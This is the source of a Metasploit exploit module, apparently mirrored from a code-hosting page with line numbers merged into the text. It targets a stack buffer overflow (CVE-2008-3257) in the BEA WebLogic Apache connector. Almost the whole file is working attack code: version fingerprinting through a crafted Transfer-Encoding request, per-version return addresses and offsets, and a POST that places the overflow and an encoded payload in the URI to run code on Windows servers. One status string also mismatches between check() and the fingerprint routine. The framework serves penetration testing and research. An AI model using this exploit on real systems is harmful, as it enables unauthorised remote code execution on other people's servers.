Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/http/bea_weblogic_post_bof.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78HttpFingerprint = { :pattern => [ /Apache/ ] }910include Msf::Exploit::Remote::HttpClient1112def initialize(info = {})13super(update_info(info,14'Name' => 'Oracle Weblogic Apache Connector POST Request Buffer Overflow',15'Description' => %q{16This module exploits a stack based buffer overflow in the BEA17Weblogic Apache plugin.1819The connector fails to properly handle specially crafted HTTP POST20requests, resulting a buffer overflow due to the insecure usage21of sprintf. Currently, this module works over Windows systems without DEP,22and has been tested with Windows 2000 / XP.2324In addition, the Weblogic Apache plugin version is fingerprinted with a POST25request containing a specially crafted Transfer-Encoding header.26},27'Author' =>28[29'KingCope', # Vulnerability Discovery and PoC30'juan vazquez', # Metasploit Module31],32'References' =>33[34[ 'CVE', '2008-3257' ],35[ 'OSVDB', '47096' ],36[ 'BID', '30273' ]37],38'DefaultOptions' =>39{40'EXITFUNC' => 'process',41},42'Privileged' => true,43'Platform' => 'win',44'Payload' =>45{46'Space' => 4000,47'BadChars' => "\x00\x0d\x0a\x3f"48},49'Targets' =>50[51[ 'Automatic', {} ],52[ 'BEA WebLogic 8.1 SP6 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]',53{54'Ret' => 0x10061f63, # push esp # ret # mod_wl_20.so55'Offset' => 410256}57],58[ 'BEA WebLogic 8.1 SP5 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]',59{60'Ret' => 0x10061473, # push esp # ret # mod_wl_20.so61'Offset' => 410262}63],64[ 'BEA WebLogic 8.1 SP4 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]',65{66'Ret' => 0x10020e31, # push esp # ret # mod_wl_20.so67'Offset' => 410268}69]70],71'DisclosureDate' => '2008-07-17',72'DefaultTarget' => 0))7374register_options(75[76OptString.new('TARGETURI', [true, 'The URI path to a jsp or object provided by Weblogic', '/index.jsp']),77])7879end808182def check8384fingerprint = fingerprint_mod_wl85print_status "#{rhost}:#{rport} - #{fingerprint}"8687case fingerprint88when /Version found/89return Exploit::CheckCode::Appears90when /BEA WebLogic connector vulnerable/91return Exploit::CheckCode::Appears92when /BEA WebLogic connector undefined/93return Exploit::CheckCode::Detected94when /BEA WebLogic connector no vulnerable/, /BEA WebLogic connector not found/95return Exploit::CheckCode::Safe96end9798end99100def exploit101102# Autodetect BEA mod_wl version103my_target = get_target104105# Avoid the attack if the victim doesn't have the same setup we're targeting106if my_target.nil?107print_error("BEA mod_weblogic not supported")108return109end110111uri = normalize_uri(target_uri.path)112sploit = rand_text_alphanumeric(my_target['Offset']-uri.length)113sploit << [my_target.ret].pack("V")114sploit << payload.encoded115116send_request_cgi({117'method' => 'POST',118'uri' => "#{uri} #{sploit}",119})120121handler122123end124125def get_target126127return target if target.name != 'Automatic'128129fingerprint = fingerprint_mod_wl130131case fingerprint132when /BEA WebLogic 8.1 SP6 - mod_wl_20.so/133return targets[1]134when /BEA WebLogic 8.1 SP5 - mod_wl_20.so/135return targets[2]136when /BEA WebLogic 8.1 SP4 - mod_wl_20.so/137return targets[3]138else139return nil140end141142end143144def fingerprint_mod_wl145146my_data = rand_text_alpha(rand(5) + 8)147res = send_request_cgi(148{149'method' => 'POST',150'uri' => normalize_uri(target_uri.path),151'headers' =>152{153'Transfer-Encoding' => my_data154},155'data' => "#{my_data.length}\r\n#{my_data}\r\n0\r\n",156})157158if res and res.code == 200 and res.body =~ /Weblogic Bridge Message/159# BEA WebLogic 8.1 SP6 - mod_wl_20.so160case res.body161when (/Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/ and /Change Number:<\/B> <I>779586/)162return "Version found: BEA WebLogic 8.1 SP6 - mod_wl_20.so"163# BEA WebLogic 8.1 SP5 - mod_wl_20.so164when (/Build date\/time:<\/B> <I>Aug 5 2005 11:19:57/ and /Change Number:<\/B> <I>616810/)165return "Version found: BEA WebLogic 8.1 SP5 - mod_wl_20.so"166when (/Build date\/time:<\/B> <I>Oct 25 2004 09:25:23/ and /Change Number:<\/B> <I>452998/)167return "Version found: BEA WebLogic 8.1 SP4 - mod_wl_20.so"168# Check for dates prior to patch release169when /([A-Za-z]{3} [\s\d]{2} [\d]{4})/170build_date = Date.parse($1)171if build_date <= Date.parse("Jul 28 2008")172return "BEA WebLogic connector vulnerable"173else174return "BEA WebLogic connector not vulnerable"175end176else177return "BEA WebLogic connector undefined"178end179end180181return "BEA WebLogic connector not found"182183end184end185186187